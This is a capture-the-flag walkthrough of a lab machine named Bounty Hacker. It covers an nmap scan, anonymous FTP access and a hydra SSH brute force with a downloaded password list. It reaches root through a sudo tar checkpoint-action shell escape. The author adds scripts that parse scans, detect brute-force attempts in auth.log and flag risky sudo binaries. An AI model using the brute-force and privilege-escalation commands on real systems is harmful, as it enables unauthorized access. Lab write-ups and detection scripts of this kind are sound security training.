# Bounty Hacker

Room Covers:

* Service Discovery
* Local Privilege Escalation

## Target Details

* IP: 10.10.160.10

## Service Discovery

* Scan with nmap. `-sV` grabs service banners, `-sC` runs the default NSE scripts (which is what surfaces the anonymous FTP login below), and `-Pn` skips the host-discovery ping so the host is scanned even if it drops ICMP

  ```bash
  nmap -sV -sC -Pn -oN scan.txt 10.10.160.10
  ```
* Scan Results

  ```bash
  # Nmap 7.92 scan initiated Thu Jun 30 12:36:54 2022 as: nmap -sC -sV -Pn -oN scan.txt 10.10.160.10
  Nmap scan report for 10.10.160.10
  Host is up (0.39s latency).
  Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused)
  PORT   STATE SERVICE VERSION
  21/tcp open  ftp     vsftpd 3.0.3
  | ftp-syst:
  |   STAT:
  | FTP server status:
  |      Connected to ::ffff:10.x.x.x
  |      Logged in as ftp
  |      TYPE: ASCII
  |      No session bandwidth limit
  |      Session timeout in seconds is 300
  |      Control connection is plain text
  |      Data connections will be plain text
  |      At session startup, client count was 2
  |      vsFTPd 3.0.3 - secure, fast, stable
  |_End of status
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
  |_-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
  |   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
  |_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  |_http-title: Site doesn't have a title (text/html).
  Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  # Nmap done at Thu Jun 30 12:37:34 2022 -- 1 IP address (1 host up) scanned in 40.35 seconds
  ```
* OS: Ubuntu (the `4ubuntu2.8` OpenSSH package revision and the `(Ubuntu)` Apache banner; OpenSSH 7.2p2 alongside Apache 2.4.18 is the Ubuntu 16.04 pairing)
* Services Found

  | Service | Port | Version       |
  | :-----: | :--: | ------------- |
  |   HTTP  |  80  | Apache/2.4.18 |
  |   FTP   |  21  | vsftpd 3.0.3  |
  |   SSH   |  22  | OpenSSH 7.2p2 |
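The service table above is hand-copied from the scan; the script below is an added example (not part of the original writeup) that builds it from an `nmap -oN` file and pulls out the two things the next step needs, whether `ftp-anon` reported an anonymous login and which files it listed. The scan text written by `make_sample_scan` is a constructed excerpt of the scan in this writeup, and the function names are mine.

```shell
#!/bin/sh
# Added example, not part of the original writeup: parse an nmap -oN file into
# the service table and flag the ftp-anon findings that drive the next step.
# The scan text below is a constructed excerpt of the scan in this writeup.

make_sample_scan() {
  cat > "$1" <<'EOF'
Nmap scan report for 10.10.160.10
Host is up (0.39s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
|_-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
EOF
}

# open_ports FILE -> open TCP ports in scan order, e.g. "21 22 80"
open_ports() {
  awk '$2 == "open" && $1 ~ /^[0-9]+\/tcp$/ {
         sub(/\/tcp$/, "", $1); printf "%s%s", sep, $1; sep = " "
       }
       END { print "" }' "$1"
}

# service_table FILE -> markdown table (service, port, version) like the one above
service_table() {
  printf '| Service | Port | Version |\n| :-----: | :--: | ------- |\n'
  awk '$2 == "open" && $1 ~ /^[0-9]+\/tcp$/ {
         port = $1; sub(/\/tcp$/, "", port)
         ver = ""
         for (i = 4; i <= NF; i++) ver = ver (i > 4 ? " " : "") $i
         printf "| %s | %s | %s |\n", toupper($3), port, ver
       }' "$1"
}

# anonymous_ftp FILE -> "yes" if the ftp-anon NSE script logged in as anonymous
anonymous_ftp() {
  if grep -q 'ftp-anon: Anonymous FTP login allowed' "$1"; then echo yes; else echo no; fi
}

# ftp_anon_files FILE -> names of the files ftp-anon listed (what to mget next);
# the listing runs from the ftp-anon line to the first "|_" continuation line
ftp_anon_files() {
  awk '/ftp-anon:/ { inlist = 1; next }
       inlist && /^[|]_? ?-/ { print $NF; if ($0 ~ /^[|]_/) inlist = 0; next }
       inlist { inlist = 0 }' "$1"
}

main() {
  service_table "$1"
  printf '\nopen ports: %s\n' "$(open_ports "$1")"
  if [ "$(anonymous_ftp "$1")" = yes ]; then
    printf '[!] anonymous FTP allowed, files: %s\n' "$(ftp_anon_files "$1" | xargs)"
  fi
}

# With a scan file as argument, parse that; otherwise run on the constructed sample.
if [ "$#" -gt 0 ]; then
  main "$1"
else
  sample=$(mktemp); make_sample_scan "$sample"; main "$sample"; rm -f "$sample"
fi
```

Run it as `sh parse_scan.sh scan.txt` against the real output of the nmap command above; the port filter keys on the `STATE` column, so filtered and closed ports never make it into the table.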

## Accessing FTP

* nmap's `ftp-anon` script already reported anonymous login, so connect and confirm it

  ```bash
  ftp 10.10.160.10
  ```

  ```bash
  Connected to 10.10.160.10.
  220 (vsFTPd 3.0.3)
  Name (10.10.160.10:attacker): anonymous
  230 Login successful.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp>
  ```
* Anonymous login is accepted (FTP code 230)
* List and download the files. `mget` only takes remote glob patterns, so `mget *` fetches everything into the current local directory; `prompt` switches off the per-file confirmation first

  ```bash
  # list files
  ftp> ls
  200 PORT command successful. Consider using PASV.
  150 Here comes the directory listing.
  -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
  -rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
  226 Directory send OK.
  ftp>

  # turn off per-file confirmation, then download everything
  ftp> prompt
  Interactive mode off.
  ftp> mget *
  ```
* `locks.txt` is a list of candidate passwords, one per line; `task.txt` is a short note that names `lin`

## Bruteforce SSH service

* `task.txt` gives `lin` as the likely username and `locks.txt` is the password list, so bruteforce that one account over SSH with hydra. `-t 4` caps the parallel connections: sshd's default `MaxStartups 10:30:100` starts dropping unauthenticated connections once 10 are pending, and hydra itself warns to use `-t 4` for SSH

  ```bash
  hydra -l lin -P locks.txt -t 4 ssh://10.10.160.10
  ```

  > Password: RedDr4gonxxxxxxxxx
* hydra reports a valid SSH password for user lin (redacted above)
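A brute force like this is loud on the target: every guess is a `Failed password` line in `/var/log/auth.log`, followed by one `Accepted password` when hydra lands the right entry from `locks.txt`. The script below is an added example (not from the original writeup) of the detection side, counting sshd failures per source address and flagging a login that is accepted after a burst of failures from the same address. The log lines in `make_sample_auth_log` are constructed, and the threshold and function names are my own choices.

```shell
#!/bin/sh
# Added example, not part of the original writeup: detect an SSH brute force
# from the target's auth.log. The log lines below are constructed for the
# example; the "invalid user" form is sshd's wording for unknown accounts.

make_sample_auth_log() {
  cat > "$1" <<'EOF'
Jun 30 12:40:01 bountyhacker sshd[1201]: Failed password for lin from 10.9.1.5 port 41000 ssh2
Jun 30 12:40:01 bountyhacker sshd[1202]: Failed password for lin from 10.9.1.5 port 41001 ssh2
Jun 30 12:40:02 bountyhacker sshd[1203]: Failed password for lin from 10.9.1.5 port 41002 ssh2
Jun 30 12:40:02 bountyhacker sshd[1204]: Failed password for lin from 10.9.1.5 port 41003 ssh2
Jun 30 12:40:03 bountyhacker sshd[1205]: Failed password for lin from 10.9.1.5 port 41004 ssh2
Jun 30 12:40:03 bountyhacker sshd[1206]: Failed password for lin from 10.9.1.5 port 41005 ssh2
Jun 30 12:40:04 bountyhacker sshd[1207]: Accepted password for lin from 10.9.1.5 port 41006 ssh2
Jun 30 12:41:10 bountyhacker sshd[1220]: Failed password for invalid user admin from 10.9.7.7 port 50010 ssh2
Jun 30 12:41:11 bountyhacker sshd[1221]: Failed password for invalid user admin from 10.9.7.7 port 50011 ssh2
Jun 30 12:42:00 bountyhacker sshd[1230]: Accepted publickey for ops from 10.9.2.2 port 60000 ssh2
EOF
}

# detect_ssh_bruteforce FILE THRESHOLD
# One line per finding, sorted:
#   ALERT <ip> <user> <failures>   login accepted after >= THRESHOLD failures from <ip>
#   BRUTE <ip> <failures>          source with >= THRESHOLD failed logins overall
detect_ssh_bruteforce() {
  awk -v thr="$2" '
    /sshd\[[0-9]+\]: (Failed|Accepted) (password|publickey) for / {
      ip = ""; user = ""
      for (i = 1; i <= NF; i++) {
        if ($i == "from") ip = $(i+1)
        # "for lin from ..." vs "for invalid user admin from ..."
        if ($i == "for") { user = $(i+1); if (user == "invalid") user = $(i+3) }
      }
      if ($0 ~ /: Failed /) {
        fails[ip]++
      } else if (ip in fails && fails[ip] >= thr) {
        # a success after a run of failures is the brute force paying off
        print "ALERT", ip, user, fails[ip]
      }
    }
    END { for (ip in fails) if (fails[ip] >= thr) print "BRUTE", ip, fails[ip] }
  ' "$1" | sort
}

# With a log file as argument, analyse that; otherwise run on the constructed sample.
if [ "$#" -gt 0 ]; then
  detect_ssh_bruteforce "$1" "${2:-5}"
else
  log=$(mktemp); make_sample_auth_log "$log"; detect_ssh_bruteforce "$log" 5; rm -f "$log"
fi
```

Run as `sh detect.sh /var/log/auth.log 5`. The `ALERT` line is the one worth paging on: a source that failed repeatedly and then got in is exactly what hydra's run against `lin` looks like from the host.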

## Login to SSH

* Login Details

  | User | Password           |
  | :--: | ------------------ |
  |  lin | RedDr4gonxxxxxxxxx |
* Login to SSH using above details

  ```bash
  ssh lin@10.10.160.10
  ```

## Privilege Escalation

* Standard first check: list SUID binaries. The escalation path on this box turns out to be sudo instead, but this is cheap to rule out

  ```bash
  find / -perm -u=s -type f 2>/dev/null
  ```
* Next check what `sudo` lets lin run as other users

  ```bash
  sudo -l

  Matching Defaults entries for lin on bountyhacker:
      env_reset, mail_badpass,
      secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

  User lin may run the following commands on bountyhacker:
      (root) /bin/tar
  ```

  > lin can run `/bin/tar` as root. The entry carries no `NOPASSWD` tag, so sudo will ask for lin's password, which we already have
* [GTFObins](https://gtfobins.github.io/gtfobins/tar/#sudo) lists a sudo shell escape for tar. GNU tar's `--checkpoint-action=exec=CMD` runs CMD at every checkpoint and `--checkpoint=1` makes the very first record a checkpoint, so the archive contents are irrelevant (`/dev/null` in and out) and CMD simply runs with tar's privileges, which under sudo are root's

  ```bash
  sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
  ```
* The spawned shell is root

  ```bash
  # whoami
  root
  ```
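The `(root) /bin/tar` line is the whole vulnerability: any binary that can run a command or spawn a shell on its own is a root shell once it is in sudoers. The script below is an added example (not from the original writeup) that audits `sudo -l` output for such entries, the check a hardening review would run on this host. The `sudo -l` text in `make_sample_sudo_l` is constructed to match the output above plus one harmless entry for contrast, and `GTFO_SUDO` is a small hand-picked subset of the binaries with a sudo entry on GTFOBins, not the full list.

```shell
#!/bin/sh
# Added example, not part of the original writeup: flag sudoers entries that
# hand out a root shell the way /bin/tar does on this box.

# Subset of binaries whose GTFOBins "sudo" section documents a shell escape
# (hand-picked for the example, not exhaustive)
GTFO_SUDO="awk bash dash env find ftp gdb git less make man more nano nmap perl python python3 ruby sh tar vi vim zip"

# Constructed sudo -l output: the writeup's entry plus a harmless one for contrast
make_sample_sudo_l() {
  cat > "$1" <<'EOF'
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOPASSWD: /usr/bin/whoami
EOF
}

# audit_sudo_l FILE -> one line per rule: <verdict>|<password or NOPASSWD>|<command>
#   RISK-full-sudo      the rule is "ALL"
#   RISK-shell-escape   the command's basename is in GTFO_SUDO
#   ok                  nothing known
audit_sudo_l() {
  awk -v bins="$GTFO_SUDO" '
    BEGIN { n = split(bins, a, " "); for (i = 1; i <= n; i++) risky[a[i]] = 1 }
    /may run the following commands/ { inlist = 1; next }
    inlist && /^[ \t]*\(/ {
      line = $0
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)        # drop the "(root)" / "(ALL : ALL)" run-as spec
      auth = (line ~ /NOPASSWD:/) ? "NOPASSWD" : "password"
      while (sub(/^[A-Z]+:[ \t]*/, "", line)) {}     # drop NOPASSWD:/SETENV: style tags
      split(line, parts, " "); cmd = parts[1]
      base = cmd; sub(/.*\//, "", base)
      if (cmd == "ALL")        verdict = "RISK-full-sudo"
      else if (base in risky)  verdict = "RISK-shell-escape"
      else                     verdict = "ok"
      print verdict "|" auth "|" cmd
    }
  ' "$1"
}

# With a saved `sudo -l` output as argument, audit that; otherwise run on the sample.
if [ "$#" -gt 0 ]; then
  audit_sudo_l "$1"
else
  f=$(mktemp); make_sample_sudo_l "$f"; audit_sudo_l "$f"; rm -f "$f"
fi
```

Usage: `sudo -l > sudo_l.txt; sh audit_sudo.sh sudo_l.txt`. On this box the output is `RISK-shell-escape|password|/bin/tar`; the fix is to drop the entry or restrict it to a wrapper script with a fixed argument list, since no sudoers argument restriction stops tar from being handed `--checkpoint-action=exec`.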

## Get Flags

* User Flag

  ```bash
  # cat /home/lin/Desktop/user.txt
  THM{CR1M3_xxxxxxxxx}
  ```
* Root Flag

  ```bash
  # cat /root/root.txt
  THM{80UN7Y_xxxxxx}
  ```
